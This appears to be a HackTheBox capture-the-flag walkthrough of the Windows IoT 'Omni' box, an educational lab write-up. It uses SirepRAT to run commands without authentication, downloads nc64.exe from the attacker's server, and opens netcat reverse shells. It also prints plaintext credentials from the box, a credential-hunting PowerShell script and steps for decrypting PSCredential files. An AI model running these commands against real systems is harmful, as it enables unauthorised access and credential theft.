HackTheBox: (“Omni”) — Walkthrough
Hi People :D
Today we are going to solve the “Omni” machine from HackTheBox. It is a Windows IoT Core box, so let’s get started :D
Before we start, you can find all the commands here
Enumeration
— — — — — — — —
First, we start with Nmap:
nmap -A 10.10.10.204
( -A enables OS detection, version detection, default script scanning and traceroute. Note that it still only scans Nmap’s top 1000 ports; anything listening on a high port needs -p- to show up )
We got port 8080 running Microsoft IIS httpd and port 135 running the RPC service.
Web Enumeration
— — — — — — — — — — —
So, let’s first visit port 8080.
Hmm, it asks for credentials and says “Windows Device Portal”. I searched a bit to learn what Windows Device Portal is and found the Microsoft documentation.
Now let’s try to find a public exploit for Windows Device Portal. The first result that came up was SirepRAT, which is used to exploit Windows IoT Core. One caveat: SirepRAT does not attack Device Portal itself. It talks to the Sirep test service that ships enabled on Windows 10 IoT Core (TCP 29819/29820, outside Nmap’s default port range) and lets an unauthenticated client run commands and read or write files, which is why it works here without any Device Portal credentials.
Let’s download it and try to get a shell. First install the requirements:
pip install -r requirements.txt
I tested it with a simple echo command:
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c echo HI" --v
( You can find how to use the tool on GitHub )
Exploitation
— — — — — — — —
Now we will upload nc64.exe to get a shell. You can download it from here, then run a Python HTTP server in the directory that contains nc64.exe:
python3 -m http.server 80
Good. Now upload nc64.exe to the machine with PowerShell using this command:
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-WebRequest -OutFile C:\Windows\System32\nc64.exe -Uri http://{Your_IP}/nc64.exe" --v
Let’s get a shell :D. First set up a listener on any port you want ( I used port 4444 ):
nc -nlvp 4444
Now run Netcat on the machine:
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Windows\System32\nc64.exe {Your_IP} 4444 -e powershell.exe" --v
Nice, we got a shell. Let’s try to find user.txt.
Unfortunately, I didn’t find the user.txt flag anywhere. I also searched the logs for any useful information, but nothing :(
The next step is to search for any .bat files:
get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force
Let’s look at the content of r.bat:
cat "C:\Program Files\WindowsPowerShell\Modules\PackageManagement\r.bat"
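The one-liner above only lists .bat files by name, which works here but is easy to miss on a noisier box. Below is an added example (my own helper, not part of the original write-up or of the box) that searches common script and config extensions and prints only the lines that look like hard-coded credentials, so a file like r.bat, or a PSCredential exported with Export-Clixml, stands out without opening each file. The extension list, the regex patterns and the 1 MB size cap are my assumptions.

```powershell
# Added example: hunt for credential-looking lines in scripts and config files.
# Patterns, extensions and the size cap are assumptions for the demonstration.
function Find-CredentialArtifacts {
    param(
        [string[]] $Root    = @('C:\'),
        [string[]] $Include = @('*.bat', '*.cmd', '*.ps1', '*.xml', '*.txt', '*.config'),
        [string[]] $Pattern = @(
            'net\s+user\s+\S+\s+\S+',   # net user <name> <password>
            'password\s*[=:]',          # password= / password:
            'ConvertTo-SecureString',   # scripted PSCredential creation
            '<SS N="Password">',        # Export-Clixml PSCredential on disk
            'PSCredential'
        )
    )

    foreach ($r in $Root) {
        Get-ChildItem -Path $r -Include $Include -Recurse -File -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Length -lt 1MB } |          # skip large logs and binaries
            Select-String -Pattern $Pattern -ErrorAction SilentlyContinue |
            ForEach-Object {
                [pscustomobject]@{
                    File = $_.Path
                    Line = $_.LineNumber
                    Text = $_.Line.Trim()
                }
            }
    }
}

# Usage: scan the system drive and the U: partition found later in the write-up.
Find-CredentialArtifacts -Root 'C:\', 'U:\' | Format-Table -AutoSize
```

Select-String does the heavy lifting: it accepts an array of patterns and returns the file, line number and matching line, so the function only has to shape the output. Keep the size cap, or a recursive grep over C:\ will spend most of its time inside event logs and DLLs.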
User Flag
— — — — — —
Very good, we got the app user and the Administrator credentials.
Let’s go back to the website and try the app credentials:
UserName: app
Password: mesh5143
Yay, we are logged in as the app user.
After checking the menus on the left, I found a “Run command” function under the Processes section.
So, let’s get a shell as the app user. Set up a listener again:
nc -nlvp 4444
and from the website run Netcat:
C:\Windows\System32\nc64.exe {Your_Ip} 4444 -e powershell.exe
Cool! I did some enumeration again and found a “U:\” partition, then a Users folder, and finally user.txt at:
U:\Users\app\user.txt
Unfortunately, it is not a plain flag :( The file is a PSCredential object exported with Export-Clixml, and its password field is a SecureString protected with DPAPI under the app user’s key. That is why it has to be decrypted from a shell running as app: any other account, even a more privileged one, cannot unprotect it.
I did some searching about PSCredential to find a way to decrypt the password.
I found this answer in one of the StackOverflow questions:
Let’s try it, but don’t forget to replace Dolphins.xml with user.txt XD
$credential = Import-Clixml -Path U:\Users\app\user.txt
( Note: $credential is just a variable; you can call it any name )
Import-Clixml has now decrypted the password into a SecureString inside the PSCredential object; we still have to read it out. I didn’t know how, so I searched again for a way to display it.
As the docs say, to display the password we call the GetNetworkCredential() method and read its Password property.
The command looks like this:
$credential.GetNetworkCredential().Password
We finally get the user flag :D
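To make the last few steps concrete, here is an added example (my own code, not from the original write-up or from the box) that builds a PSCredential, exports it with Export-Clixml the way user.txt was produced, inspects what actually lands on disk, and reads it back both with the write-up’s Import-Clixml method and with the equivalent ConvertTo-SecureString call. The file name demo-cred.xml and the sample password are assumptions.

```powershell
# Added example: round-trip a PSCredential through Export-Clixml / Import-Clixml
# to show what user.txt contains and why only the account that wrote it can
# read it back. File name and sample password are made up for the demo.

$path  = Join-Path $env:TEMP 'demo-cred.xml'
$plain = 'constructed-flag-value'

# 1. Build the object the way the box author presumably did. Get-Credential
#    would prompt interactively, so the password is constructed inline here.
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('flag', $secure)

# 2. Export-Clixml serialises the SecureString as a DPAPI blob bound to the
#    current user account (this is the format of U:\Users\app\user.txt).
$cred | Export-Clixml -Path $path

# 3. What is on disk: the password is a hex-encoded DPAPI blob, not plaintext.
$raw = Get-Content -Path $path -Raw
if ($raw -notmatch '<SS N="Password">([0-9A-Fa-f]+)</SS>') {
    throw 'no <SS N="Password"> element found in the export'
}
$blob = $Matches[1]
"On-disk password field: $($blob.Substring(0, 32))... ($($blob.Length) hex chars)"

# 4. The write-up's method: Import-Clixml unprotects the blob with DPAPI and
#    GetNetworkCredential() exposes the plaintext.
$imported  = Import-Clixml -Path $path
$recovered = $imported.GetNetworkCredential().Password
"Recovered via Import-Clixml: $recovered"

# 5. Equivalent manual route: the SS element is a standard SecureString export,
#    so ConvertTo-SecureString accepts the hex blob directly. Run as any other
#    user this throws "Key not valid for use in specified state", which is why
#    the decryption has to happen in a shell running as app (or administrator
#    for root.txt).
$ss2    = ConvertTo-SecureString -String $blob
$manual = [System.Net.NetworkCredential]::new('', $ss2).Password
if ($manual -ne $plain) { throw 'round trip failed' }
"Recovered via ConvertTo-SecureString: $manual"

Remove-Item -Path $path -ErrorAction SilentlyContinue
```

The point of step 5 is that nothing about user.txt is “encrypted” in the sense of needing a key you have to find: DPAPI already has the key, scoped to the user profile, so the whole trick on this box is being the right user when you call Import-Clixml.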
Root Flag
— — — — — —
You can get the root flag in exactly the same way!
First, log in to the website with the Administrator credentials:
UserName: administrator
Password: _1nt3rn37ofTh1nGz
Secondly, get a shell with the same command:
C:\Windows\System32\nc64.exe {Your_Ip} 4444 -e powershell.exe
Thirdly, go to U:\Users\administrator, where you’ll find root.txt (again a Clixml-exported PSCredential, this time bound to the Administrator account), and decrypt it the same way:
$credential = Import-CliXml -Path U:\Users\administrator\root.txt
then:
$credential.GetNetworkCredential().Password
Thanks for reading, and I hope you have benefited from this simple writeup :D